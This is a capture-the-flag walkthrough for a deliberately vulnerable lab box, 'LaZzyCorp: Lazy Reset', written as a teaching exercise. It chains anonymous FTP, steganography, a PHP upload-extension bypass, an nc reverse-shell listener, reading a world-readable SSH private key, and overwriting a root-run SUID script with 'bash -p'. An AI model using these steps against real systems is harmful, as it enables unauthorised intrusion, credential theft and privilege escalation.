By ItsMhaa
Welcome to DevCorp — where mistakes are meant to be reset.
In this easy-to-medium difficulty CTF, you step into the shoes of a security researcher investigating a careless developer’s internal staging machine.
What starts with anonymous FTP access slowly unravels into a multi-step chain of steganography, web exploitation, SSH hijacking, and a SUID binary that resets more than just the website 😏
Name: LaZzyCorp: Lazy Reset
Difficulty: Easy-Medium
Creator: ItsMhaa
OS: Ubuntu 20.04
IP: [Dynamic/Static – e.g., 192.168.1.150]
DevCorp is a startup working on a blog platform. Their junior dev, Arvind, has been testing things on a local server — but in classic lazy fashion, he’s left behind:
- Sensitive developer notes
- A hidden image in FTP
- His personal SSH key
- And worst of all… a reset tool that runs as root 🧨
Your goal?
Pivot from anonymous FTP to full root by chaining together misconfigs, forgotten files, and one poorly secured script.
A misconfigured FTP server and a lazy reset tool set the stage for your exploitation path.
Expect a mix of:
- Steganography
- Upload bypasses
- Permission abuse
- A clean privilege escalation path
- Minimal guesswork, maximum fun!
-
Run
nmap→ open ports: 21 (FTP), 80 (HTTP), 22 (SSH) -
Try anonymous FTP → Success
-
Inside
/pub/, you find:✅
note.jpg(Note:- Make sure while downloading file you use binary mode of FTP. )
-
Extract hidden data using:
steghide extract -sf note.jpg
-
Hidden creds discovered inside:
Username: dev Password: **** -
Visit the site →
/login -
Upload
shell.phpusing extension bypass:.php.upload -
Start listener:
nc -lvnp 4444
-
Trigger uploaded shell → gain reverse shell as www-data
-
While in shell:
cat /home/arvind/.ssh/id_rsa
-
File is world-readable
-
Copy it to your attacker box → Save as
id_rsa→chmod 600 id_rsa -
SSH into:
ssh -i id_rsa arvind@<target-ip>
-
List SUID binaries:
find / -perm -4000 2>/dev/null -
You find:
/home/arvind/reset
-
It runs:
/usr/bin/reset_site.sh
-
And that file is writable by arvind
-
Modify it:
echo 'bash -p' > /usr/bin/reset_site.sh
-
Now run:
/home/arvind/reset
-
BOOM → Root shell
/home/arvind/user.txt → FLAG{****}
/root/root.txt → FLAG{*****}
✅ Steganography + FTP
✅ Web login & PHP upload bypass
✅ Reading SSH keys from web shells
✅ SSH pivoting
✅ SUID + script poisoning for root access
This box was made for:
- Beginners learning post-exploitation
- People wanting story-based lateral movement
- CTF lovers who enjoy clean logic over rabbit holes
Made with ❤️ by ItsMhaa
LinkedIn: www.linkedin.com/in/mohammad-husain-ajani
GitHub: https://github.com/mohammadajani/mohammadajani
Notion Walkthrough: LaZzyCorp: Lazy Reset